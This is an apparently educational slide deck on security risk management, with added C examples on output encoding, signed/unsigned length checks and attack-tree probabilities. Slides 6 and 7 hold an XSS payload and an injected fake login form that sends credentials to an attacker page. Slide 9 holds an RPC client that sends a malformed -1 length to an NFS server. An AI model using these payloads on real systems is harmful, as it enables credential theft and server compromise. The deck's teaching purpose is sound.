
Risk Management



  1. Risk Management
  • Company name
  • Prepared by Mahmoud Elmadhoun
  • Supervised by Ms. Eman Elagrami

  2. Agenda
  • The definition of risk and its components
  • Countermeasures in the event of risk
  • How to manage the risk and its probability

  3. The definition of risk and its components
  • Risk is the probability that a threat exists and can be exploited; the weakness the threat uses to do so is called the vulnerability.
  • From this definition, risk separates into two main components:
  • Threat: an attempt to gain access to the organization's confidential information.
  • Vulnerability: a weakness in the organization through which the attacker can act.

  4. Vulnerabilities
  • Vulnerabilities are of two types:
  • Technical vulnerability: a weakness in the technical protection of a system. Exploiting it is a technical attack.
  • Administrative vulnerability: a weakness in people or procedures. Exploiting it is a non-technical attack, also called a social-engineering attack.

  5. Vulnerabilities
  • They can also be divided by how easy they are to exploit:
  • High-level vulnerability: easy to exploit, for example by writing a short piece of code that triggers the flaw.
  • Low-level vulnerability: hard to exploit; it demands considerable money, time or other resources from the attacker.

  6. Example: Cross-Site Scripting (XSS)
  • The injected content may be HTML, JavaScript, VBScript, ActiveX or Flash.
  • The attacker modifies a URL of the target site so that a parameter carries script, which the page reflects back unescaped:

      <script language="Javascript">alert('Welcome')</script>
      http://www.example.com/search?keyword=<script language="Javascript">alert('Welcome')</script>

  7. Instead of a harmless alert, the same parameter can inject a fake login form whose submission goes to a page the attacker controls (destination.asp here), capturing the victim's credentials:

      <br><br>Please login with the form below before proceeding:
      <form action="destination.asp">
        <table>
          <tr><td>Login:</td><td><input type=text length=20 name=login></td></tr>
          <tr><td>Password:</td><td><input type=text length=20 name=password></td></tr>
        </table>
        <input type=submit value=LOGIN>
      </form>
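The reflected-parameter bug behind slides 6 and 7, and its fix, output encoding, as an added example written for this page (it is not code from the presentation or from any real site). It is in C to match the rest of the deck's code; render_search() is a constructed stand-in for the server-side handler behind /search?keyword=..., and the payload is the one from slide 6.

```c
/* Added example (not from the slides): reflecting a request parameter into
 * HTML raw, as the page on slide 6 does, versus HTML-encoding it first.
 * render_search() is a constructed stand-in for the /search handler. */
#include <stdio.h>
#include <string.h>

/* Encode the five characters that let text break out of an HTML text node
 * or attribute value.  Returns bytes written (excluding the NUL), or -1 if
 * out is too small to hold the result. */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in; in++) {
        const char *rep;
        char one[2] = { *in, 0 };
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t l = strlen(rep);
        if (n + l + 1 > outlen)
            return -1;
        memcpy(out + n, rep, l);
        n += l;
    }
    out[n] = 0;
    return (int)n;
}

/* Render the results line for /search?keyword=...  With escape == 0 the
 * keyword is reflected raw (the vulnerable behaviour of slide 6); with
 * escape != 0 it is HTML-encoded first.  Returns bytes written or -1. */
int render_search(const char *keyword, int escape, char *page, size_t pagelen)
{
    char buf[1024];
    const char *shown = keyword;
    if (escape) {
        if (html_escape(keyword, buf, sizeof buf) < 0)
            return -1;
        shown = buf;
    }
    int n = snprintf(page, pagelen, "<p>Results for: %s</p>", shown);
    return (n < 0 || (size_t)n >= pagelen) ? -1 : n;
}

/* 1 if the rendered page still contains a live <script> or <form> tag.
 * Case-sensitive on purpose: enough for this demonstration, not a filter. */
int page_has_active_markup(const char *page)
{
    return strstr(page, "<script") != NULL || strstr(page, "<form") != NULL;
}

int main(void)
{
    /* the slide-6 payload, constructed here as the request parameter */
    const char *payload = "<script language=\"Javascript\">alert('Welcome')</script>";
    char page[2048];

    render_search(payload, 0, page, sizeof page);
    printf("raw:     %s  (active markup: %d)\n", page, page_has_active_markup(page));
    render_search(payload, 1, page, sizeof page);
    printf("escaped: %s  (active markup: %d)\n", page, page_has_active_markup(page));
    return 0;
}
```

The point is that the script is not removed or detected; it is turned into inert text (`&lt;script ...&gt;`) at the moment it is written into the page, which is why encoding at output, not input filtering, is the defence to apply to every reflected parameter.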

  8. Vulnerabilities: signed/unsigned length check (Linux 2.4, NFSv3 file-handle decoding)
  • decode_fh() reads a 32-bit length from the request and copies that many bytes into a fixed-size handle. The check below is only safe because size is unsigned: declared as a signed int, a negative length such as the -1 sent by the client on the next slide would compare as less than NFS3_FHSIZE, pass the check and be converted to a huge size_t inside memcpy().

      static inline u32 *decode_fh(u32 *p, struct svc_fh *fhp)
      {
          unsigned int size;                  /* unsigned: the safe form */

          fh_init(fhp, NFS3_FHSIZE);
          size = ntohl(*p++);                 /* length word from the XDR stream */
          if (size > NFS3_FHSIZE)             /* rejects anything larger than the buffer */
              return NULL;
          memcpy(&fhp->fh_handle.fh_base, p, size);
          fhp->fh_handle.fh_size = size;
          return p + XDR_QUADLEN(size);       /* skip the (4-byte padded) handle bytes */
      }

  9. Code
  • A Sun RPC client that calls the server's GETATTR procedure with a file handle whose length word is -1 instead of a real handle:

      #include <stdio.h>
      #include <stdlib.h>
      #include <rpcsvc/nfs_prot.h>
      #include <rpc/rpc.h>
      #include <rpc/xdr.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>

      #define NFSPROG 100003
      #define NFSVERS 3
      #define NFSPROC_GETATTR 1

      static struct diropargs heh;

      /* Instead of encoding a real file handle, emit a single 32-bit length
       * word of -1 (0xffffffff).  A server that reads this into a signed int
       * passes the "size > NFS3_FHSIZE" check shown on the previous slide. */
      bool_t xdr_heh(XDR *xdrs, diropargs *heh)
      {
          int32_t werd = -1;
          return xdr_int32_t(xdrs, &werd);
      }

      int main(void)
      {
          CLIENT *client;
          struct timeval tv;

          /* "marduk" is the name of the target NFS server used on the slide */
          client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
          if (client == NULL) {
              clnt_pcreateerror("clnt_create");
              exit(1);                        /* do not go on to dereference a NULL client */
          }
          tv.tv_sec = 3;
          tv.tv_usec = 0;
          client->cl_auth = authunix_create_default();
          clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
                    (xdrproc_t) xdr_void, NULL, tv);
          return 0;
      }
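To make the signed/unsigned point of slide 8 concrete without a kernel or an NFS server, here is an added user-space example (not code from the slides) that rebuilds the decode_fh() bounds check in two variants, one with a signed length and one with the unsigned length the slide shows, and feeds both the request the slide-9 client emits: a length word of -1. fh_t, FHSIZE_MAX, the helper names and the request contents are constructed for this demonstration.

```c
/* Added example (not from the slides): the decode_fh() bounds check of
 * slide 8 rebuilt in user space in two variants, one with a signed length
 * (the signed/unsigned defect the slide title refers to) and one with the
 * unsigned length shown on the slide.  Both are fed the same request the
 * client on slide 9 emits: a length word of -1.  fh_t, FHSIZE_MAX and the
 * request contents are constructed for this demonstration. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>

#define FHSIZE_MAX 64                 /* stands in for NFS3_FHSIZE */

typedef struct {
    unsigned int  fh_size;
    unsigned char fh_base[FHSIZE_MAX];
} fh_t;

/* Signed variant.  ntohl(0xffffffff) read into an int is -1, which is not
 * greater than FHSIZE_MAX, so the check passes; memcpy() would then be
 * handed (size_t)-1 == SIZE_MAX.  The copy is skipped for negative sizes
 * here so the demonstration can run; *would_copy records what memcpy()
 * would have been asked for.  Returns 1 if the check accepted the length. */
static int decode_fh_signed(const uint32_t *p, fh_t *fhp, size_t *would_copy)
{
    int size = (int)ntohl(*p++);
    if (size > FHSIZE_MAX)
        return 0;
    *would_copy = (size_t)size;
    if (size >= 0) {
        memcpy(fhp->fh_base, p, (size_t)size);
        fhp->fh_size = (unsigned int)size;
    }
    return 1;
}

/* Unsigned variant, as on slide 8: 0xffffffff stays 4294967295, fails the
 * check and is rejected before any copy. */
static int decode_fh_unsigned(const uint32_t *p, fh_t *fhp, size_t *would_copy)
{
    unsigned int size = ntohl(*p++);
    if (size > FHSIZE_MAX)
        return 0;
    *would_copy = size;
    memcpy(fhp->fh_base, p, size);
    fhp->fh_size = size;
    return 1;
}

/* Constructed XDR request: one length word followed by three words of
 * filler ("AAAA"); with length -1 the first word is what xdr_heh() sends. */
static void build_request(uint32_t *buf, int32_t length)
{
    buf[0] = htonl((uint32_t)length);
    for (int i = 1; i < 4; i++)
        buf[i] = htonl(0x41414141u);
}

/* 1 if the signed decoder accepts -1 (and would copy SIZE_MAX bytes) while
 * the unsigned decoder rejects it. */
int signed_check_is_bypassed(void)
{
    uint32_t req[4];
    fh_t fh;
    size_t n_s = 0, n_u = 0;
    build_request(req, -1);
    int acc_s = decode_fh_signed(req, &fh, &n_s);
    int acc_u = decode_fh_unsigned(req, &fh, &n_u);
    return acc_s == 1 && acc_u == 0 && n_s == SIZE_MAX;
}

/* 1 if a legitimate 12-byte handle is accepted and copied by both. */
int legit_handle_accepted(void)
{
    uint32_t req[4];
    fh_t fh_s, fh_u;
    size_t n_s = 0, n_u = 0;
    build_request(req, 12);
    int acc_s = decode_fh_signed(req, &fh_s, &n_s);
    int acc_u = decode_fh_unsigned(req, &fh_u, &n_u);
    return acc_s && acc_u && n_s == 12 && n_u == 12 &&
           fh_u.fh_size == 12 && memcmp(fh_u.fh_base, "AAAAAAAAAAAA", 12) == 0;
}

/* 1 if an oversize positive length (FHSIZE_MAX + 1) is rejected by both. */
int oversize_rejected_by_both(void)
{
    uint32_t req[4];
    fh_t fh;
    size_t n = 0;
    build_request(req, FHSIZE_MAX + 1);
    return decode_fh_signed(req, &fh, &n) == 0 &&
           decode_fh_unsigned(req, &fh, &n) == 0;
}

int main(void)
{
    printf("-1 bypasses signed check, rejected by unsigned: %d\n", signed_check_is_bypassed());
    printf("12-byte handle accepted by both:               %d\n", legit_handle_accepted());
    printf("oversize length rejected by both:              %d\n", oversize_rejected_by_both());
    return 0;
}
```

The only difference between the two decoders is the type of one local variable; the positive-length tests behave identically, which is why this class of bug survives ordinary testing and is caught by looking at every comparison between a length taken from the wire and a buffer size.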

  10. Threat
  • A threat has three essential components:
  • Target
  • Agent
  • Event

  11. Target
  • The target is the organization's information. The attacker may strike at any of the following properties:
  • Confidentiality: disclosure of confidential information to others.
  • Integrity: unauthorized modification of the organization's information.
  • Availability: denial of service (DoS) against the information or the systems that hold it.
  • Accountability: the attacker conceals the attack so that it cannot be traced back to them and punished.

  12. Agents
  • An agent must have three things:
  • Access to the target: either direct, through an account that can log in to the system, or indirect, through an intermediary.
  • Knowledge of the target.
  • Motivation.

  13. Events
  • The event is the action the agent takes against the target. The most important kinds are unauthorized access to information or systems, misuse of access that was authorized, and the introduction of malicious code (viruses or Trojans) into the systems.

  14. Countermeasures in the event of risk
  • The information an organization holds, and how important it is, differ from one organization to another, so the appropriate action differs too. Intervention may come before the danger materialises, which is called the Proactive Model, or after it has occurred, which is called the Reactive Model.

  15. Countermeasures in the event of risk
  • Some examples of countermeasures against a threat or attack:
  • Firewalls
  • Anti-virus software
  • Access control
  • Two-factor authentication systems
  • Well-trained employees

  16. How to manage the risk and probability
  • Steps involved in risk management:
  • Risk analysis
  • Decision management
  • Implementation

  17. How to manage the risk and probability
  • Risk-management intervention divides into two models:
  • Reactive Model: the most common type, sometimes called "emotional" intervention. For example, the company's security officer installs anti-virus software only after a virus has already spread and destroyed some machines. Its cost is:
      Protection cost = total cost of the risk + cost of the countermeasures

  18. How to manage the risk and probability
  • Proactive Model: intervention before the risk occurs. It is much better in terms of cost, because only the residual (minimum) risk is paid for:
      Protection cost = cost of the minimum risk + cost of the countermeasures

  19. How to manage the risk and probability
  • Calculating the probability of a threat with an attack tree:
  • Place the threat (the attacker's goal) at the root of the tree.
  • Search for the paths that could lead to the threat occurring.
  • Combine these paths with AND and OR nodes.
  • The tree is built from the top down: start at the root and decompose it into the paths that could lead to it, then combine the probabilities of the leaves upward through the AND and OR nodes.

  20. How to manage the Risk and probability

  21. How to manage the risk and probability
  • Example: the attacker tries to obtain the root password.
  • Either the attacker guesses the root password (path A),
  • or the attacker attacks the network for exploitable bugs (path B).
  • The second path requires two conditions at once, so it is an AND node: 1. there is an exploitable vulnerability in a service, and 2. the system has not been updated or configured properly, so the vulnerability is still open. Each such path is a branch of the tree.

  22. How to manage the Risk and probability

  23. How to manage the risk and probability
  • P(A: guessing the root password) = 5/1000 = 0.005
  • P(B: exploiting the active server) = 50/1000 = 0.05
  • P(C: system not updated or not configured properly) = 0.1
  • B and C are combined with AND; the result is combined with A by OR.

  24. How to manage the risk and probability
  • Assume the events are independent: guessing the password (A) is independent of exploiting the server (B), and exploiting the server only succeeds when the system is unpatched (C).
  • AND: P(BC) = P(B) × P(C) = 0.05 × 0.1 = 0.005
  • OR: P(break-in) = P(A) + P(BC) − P(A)·P(BC) = 0.005 + 0.005 − 0.005 × 0.005 = 0.009975
  • Total probability of a break-in: 0.009975 (about 1%).
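The AND/OR rules of slides 19 to 24, as an added example written for this page (not code from the presentation): a small attack-tree evaluator in C. It goes beyond the slides' two-child case: an OR node with any number of independent children has P = 1 − ∏(1 − p_i), which for two children is exactly P(A) + P(B) − P(A)·P(B), and an AND node is the product of its children. The node names and numbers are the slides' own; the struct layout, function names and the re-evaluation with a lower P(C) are assumptions made for the demonstration.

```c
/* Added example (not from the slides): an attack-tree evaluator applying
 * the AND and OR rules of slides 19 to 24.  It generalises the slides'
 * two-child case: an OR node with any number of independent children has
 * P = 1 - prod(1 - p_i), which for two children is P(A) + P(B) - P(A)P(B);
 * an AND node is the product of its children.  Node names and
 * probabilities follow slides 21 and 23. */
#include <stdio.h>

enum node_kind { LEAF, AND_NODE, OR_NODE };

struct node {
    const char *name;
    enum node_kind kind;
    double p;                       /* leaf probability; unused otherwise */
    const struct node *child[4];
    int nchild;
};

/* Bottom-up evaluation: leaves return their probability, AND multiplies
 * the children (all must happen, assumed independent), OR takes the
 * complement of "no child happens". */
double eval(const struct node *n)
{
    if (n->kind == LEAF)
        return n->p;
    double acc = 1.0;
    for (int i = 0; i < n->nchild; i++) {
        double c = eval(n->child[i]);
        acc *= (n->kind == AND_NODE) ? c : (1.0 - c);
    }
    return (n->kind == AND_NODE) ? acc : 1.0 - acc;
}

/* The tree of slides 21 and 23: break-in = A OR (B AND C). */
static const struct node A  = { "A: guess root password",           LEAF, 0.005, {0}, 0 };
static const struct node B  = { "B: exploit the active server",     LEAF, 0.05,  {0}, 0 };
static const struct node C  = { "C: system not updated/configured", LEAF, 0.1,   {0}, 0 };
static const struct node BC = { "BC: attack the service", AND_NODE, 0.0, { &B, &C }, 2 };
static const struct node ROOT = { "break-in", OR_NODE, 0.0, { &A, &BC }, 2 };

double p_attack_service(void) { return eval(&BC); }     /* 0.005 */
double p_break_in(void)       { return eval(&ROOT); }   /* 0.009975 */

/* Slide 24's two-term OR formula, to check the general rule against it. */
double p_break_in_two_term(void)
{
    double a = eval(&A), bc = eval(&BC);
    return a + bc - a * bc;
}

/* Re-evaluate the tree with a different P(C).  This is how a countermeasure
 * (here patching, which lowers the chance the system is left unpatched) is
 * priced into the tree before the risk materialises, i.e. proactively. */
double p_break_in_with_unpatched_rate(double pc)
{
    struct node c = C;       c.p = pc;
    struct node bc = BC;     bc.child[1] = &c;
    struct node root = ROOT; root.child[1] = &bc;
    return eval(&root);
}

/* Floating-point comparison helper for the checks below. */
int near_eq(double a, double b)
{
    double d = a - b;
    return (d < 0 ? -d : d) < 1e-9;
}

int main(void)
{
    printf("P(BC)       = %.6f\n", p_attack_service());
    printf("P(break-in) = %.6f\n", p_break_in());
    printf("two-term OR = %.6f\n", p_break_in_two_term());
    printf("P(break-in) if P(C) drops to 0.01 = %.7f\n",
           p_break_in_with_unpatched_rate(0.01));
    return 0;
}
```

Dropping P(C) from 0.1 to 0.01 cuts the break-in probability from 0.009975 to 0.0054975, so the tree also answers the question slides 17 and 18 raise: it shows what each proactive countermeasure buys before the cost of the realised risk has to be paid.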

  25. References
  • http://www.c4arab.com/showlesson.php?lesid=1756
  • http://www.c4arab.com/showlesson.php?lesid=175
  • William Stallings, Cryptography and Network Security, 4th edition, Prentice Hall, November 2005

  26. Thanks
